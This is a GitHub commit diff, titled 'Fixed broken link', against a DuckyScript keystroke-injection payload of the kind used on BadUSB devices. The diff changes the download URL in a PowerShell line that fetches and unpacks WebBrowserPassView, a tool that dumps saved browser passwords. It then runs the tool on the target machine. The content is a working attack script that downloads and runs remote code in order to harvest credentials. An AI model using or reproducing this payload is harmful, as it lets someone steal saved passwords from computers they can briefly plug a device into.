Fixed broken link (thanks jbohack!)

This commit is contained in:
UberGuidoZ 2024-09-25 12:27:18 -07:00 committed by GitHub
parent 7b1466ffbc
commit ff9c98f7e2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -8,7 +8,7 @@ DELAY 1000
STRING rmdir -R \temp
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://files.catbox.moe/iqlnan.zip -OutFile webpassview.zip ; Expand-Archive webpassview.zip
ENTER
STRING .\WebBrowserPassView.exe
ENTER